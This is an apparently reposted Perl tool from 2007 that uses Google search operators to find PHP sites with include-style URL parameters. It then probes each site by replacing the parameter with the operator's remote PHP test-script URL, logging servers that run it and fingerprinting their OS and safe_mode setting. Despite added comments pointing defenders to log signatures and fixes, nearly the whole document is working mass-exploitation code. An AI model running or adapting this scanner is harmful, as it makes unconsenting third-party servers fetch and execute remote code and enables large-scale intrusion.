google-php-include-bugs searcher v 0.8 ( 0day )

    [多云 May 5, 2007 22:51 | by ]
#! /usr/bin/perl
# ================================================================ #
#          google-php-include-bugs searcher v 0.8                  #
#                          (c)oded by drmist\STNC                  #
#                          www.security-teams.net                  #
#                                                                  #
#                 ATTENTION. THIS SCRIPT IS PRIVATE.               #
#              ONLY FOR STNC AND FRIENDS. NOT FOR SALE.            #
#                                                                  #
#  Usage: perl script.pl --log= --url=  #
#  Test script:                                                    #
#  #  error_reporting(0);                                             #
#  $s = md5("STNC");                                               #
#  $code = eregi("windows", php_uname())+                          #
#  2*eregi("apache", getenv("SERVER_SOFTWARE"))+                   #
#  4*ini_get('safe_mode'); echo $s."[$code]".$s;                   #
#  ?>                                                              #
# ================================================================ #


use IO::Socket;

# Query-parameter names the scan loop looks for. Each name is used twice:
# in the search query as `inurl:<name>=` and later as the parameter whose
# value is replaced in a candidate URL. For a defender this is the list of
# parameter names to audit wherever a PHP application feeds a request
# parameter into a file-loading call, and to watch for in access logs.
@inc_bugs = ("page", "text", "print", "html", "url", "view", "show", "body", "cat",
           "inc", "incl", "include", "read", "write", "data", "code", "fname",
    "filename", "cont", "content", "menu", "open", "file", "id", "p", "f",
    "seite", "pagina", "vista", "vue", "visao", "datei", "offnen", "corpo",
    "corps", "ouvrir", "fichier", "abrir", "fichero", "inhalt", "contenu",
    "conteudo");

# Top-level domains placed in the `site:` search operator, one query per
# entry. "be" is listed twice, so that zone is queried twice.
@zones = ("com", "net", "org", "de", "fr", "uk", "br", "am",
        "info", "name", "aero", "biz", "edu", "ws", "in",
 "cn", "us", "be", "it", "cc", "tv", "ru", "su",
 "jp", "kz", "se", "is", "ca", "gs", "ms", "vg",
 "be", "fi", "gov");

# File extensions placed in the `filetype:` search operator.
@ftypes = ("php", "php3");

# Fixed marker that the test script prints before and after its result code;
# the scan loop matches responses against <marker>[<digits>]<marker>.
# Because the value is constant, its appearance in a site's outbound HTTP
# responses is a usable indicator that a remotely supplied script ran there.
$boundary = "ca73bad132fa0c99fe9ce9efe9029e21"; # md5("STNC");

# Command-line handling: pick up --log=<file> and --url=<url> from @ARGV.
# Any other argument is ignored; a later occurrence of an option overrides
# an earlier one.
foreach my $arg (@ARGV)
{
    if ($arg =~ /^--log=(.*)$/) { $log = $1; next; }
    if ($arg =~ /^--url=(.*)$/) { $script = $1; }
}

# Both values must be present and true in Perl's sense; otherwise show the
# help text and stop.
unless ($script && $log) { usage(); exit; }

# Main scan loop. For every (parameter name, TLD, file type) combination it
# builds a search query, passes up to ten result-page URLs to get(), pulls
# http:// URLs out of whatever comes back, and for one URL per domain sends a
# second request in which the parameter value is replaced by the operator's
# --url value. A response containing the boundary marker is logged as a hit.
#
# What this looks like from the receiving web server: a single GET in which
# one of the @inc_bugs parameters carries an absolute http:// URL followed
# by "?". That shape is the thing to alert on in access logs. The underlying
# weakness is a request parameter reaching include/require unchecked; fixing
# that (fixed allow-list of page names) and keeping PHP's allow_url_include
# disabled removes what the probe tests for.
foreach $inc(@inc_bugs)
{
foreach $zone(@zones)
{
  foreach $ftype(@ftypes)
  {
    # Human-readable form of the query, echoed to the console.
    $request = "filetype:$ftype site:$zone inurl:$inc=";      
    print "\n[$request]\n";

    # Percent-encode every character of the query, not only reserved ones.
    $request =~ s/(.)/sprintf("%%%02x",ord($1))/eg;
    # Domains already probed for this query; reset per query, so the same
    # domain can be probed again under a different parameter/zone/type.
    @dn = ();

    # Ten pages of 100 results each: start=000, 100, ... 900.
    for($i = 0;$i < 10; $i++)
    {
      # List-context match: @temp receives every http:// URL-looking string
      # found in the text returned by get().
      @temp = get("//www.google.com/search?filter=0&num=100&start=".$i.
       "00&q=$request")  =~ /(http\:\/\/[a-z0-9\.\-\/\?\:\&\%\=\_]{5,})/gi;
      foreach $url (@temp)
{
 # Keep only URLs that actually contain "<param>=<value>". Because this
 # match succeeded, $` and $' below are the text before and after it.
 if($url !~ /($inc=[^\&]+)/i) { next; }
 $left = $`; $right = $';
 # Skip search-engine cache links served from a bare IP address.
 if($url =~ /https?\:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/search\?q=cache:/i){ next; }
 # Skip the search engine's own URLs.
 if($url =~ /google\.com/i){ next; }

 # Host name without a leading "www.", used as the de-duplication key.
 ($domain) = $url =~ /^http\:\/\/([a-z0-9\.\-]{5,})/;
 if($domain =~ /^www\.(.+)$/) { $domain = $1; }
 # Linear search of @dn; skip the URL if this domain was already probed.
 $f=0;foreach(@dn){if($_ eq $domain){$f++;last;}}if($f){next;}
 push @dn, $domain;

 # Display form of the candidate, with the value shown as a placeholder.
 $print = "$left$inc=[INCLUDE]$right";
 # The probe itself: same URL with the parameter value swapped for the
 # --url value plus "?". $data receives the digits between the two markers.
 if(($data) = get("$left$inc=$script\?$right") =~ /$boundary\[([0-9]+)\]$boundary/i)
 {
   # Decode the result code produced by the test script shown in the file
   # header: bit 0 = Windows host, value above 3 = safe_mode bit set.
   $s = "$print - ".(($data % 2) ? "WINDOWS" : "UNIX").(($data > 3) ? ", SAFE_MODE" : "")."\n";
   $count++;
   print "[$count] $s";

   # Append the hit to the log file. Two-argument open on a path taken
   # from the command line, bareword handle, and no check of the result.
   open LOG, ">>$log";
   print LOG $s;
   close LOG;
 }
 else {
   print "$print - no bugs\n";
 }
}
    }
  }
}
}

# SIGALRM handler installed by get(): closes the shared global socket handle
# that get() is currently reading from.
sub timeout()
{
    return close($sock);
}

# Minimal HTTP/1.0 GET over a raw TCP socket.
#
# Argument: a URL string. Only strings of the form http://host[:port]/path
# are handled; anything else skips the network code entirely.
# Returns: everything read from the socket (status line, headers and body)
# as one string; "" when the URL did not match; 0 when the connection
# could not be opened.
sub get()
{
# `local` gives these package globals temporary values for the duration of
# the call, so the caller's own $request and $data are restored on return.
local $request = $_[0];
local $port = 80;
local $data = "";

# Split the URL into host part and path (the path must be non-empty).
if(local($server, $url) = $request =~ /^http\:\/\/([^\/]+)\/(.+)$/)
{
  # Optional explicit port of 2 to 5 digits after the host name.
  if($server =~ /^([^\:]+)\:([0-9]{2,5})$/){ $server = $1; $port = $2; }

  # $sock is a package global so that the timeout() handler can reach it.
  $sock = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => $port,
    Proto => 'tcp',
    Type => SOCK_STREAM,
    TimeOut => $timeout
  ) or return 0; # connection failed

  # The request consists of the request line and a Host header only: no
  # User-Agent, Accept or Referer. On the receiving side that presumably
  # shows up as an HTTP/1.0 request with an empty user-agent field, which
  # is a cheap log filter for this kind of client.
  print $sock "GET /$url HTTP/1.0\r\nHost: $server\r\n\r\n";

  # Bound the read phase to 10 seconds: the SIGALRM handler closes the
  # socket, and the alarm is cancelled once the read loop finishes.
  $SIG{ALRM} = \&timeout; alarm 10;
  while(<$sock>){ $data .= $_; }
  alarm 0; close $sock;
}

return $data;
}

# Print the command-line syntax followed by the PHP test script the tool
# expects to find at the --url location. That script prints md5("STNC"),
# a bracketed numeric code (1 = Windows, 2 = Apache, 4 = safe_mode, summed),
# and the same md5 value again; the scan loop searches responses for exactly
# that marker pair.
sub usage()
{
    print <<"END_USAGE";
Usage: perl $0 --log=<log-file> --url=<url-of-test-script-source>
Test script:
<?php
error_reporting(0);
\$s = md5("STNC");
\$code = eregi("windows", php_uname())+
2*eregi("apache", getenv("SERVER_SOFTWARE"))+
4*ini_get('safe_mode'); echo \$s."[\$code]".\$s;
?>
END_USAGE
}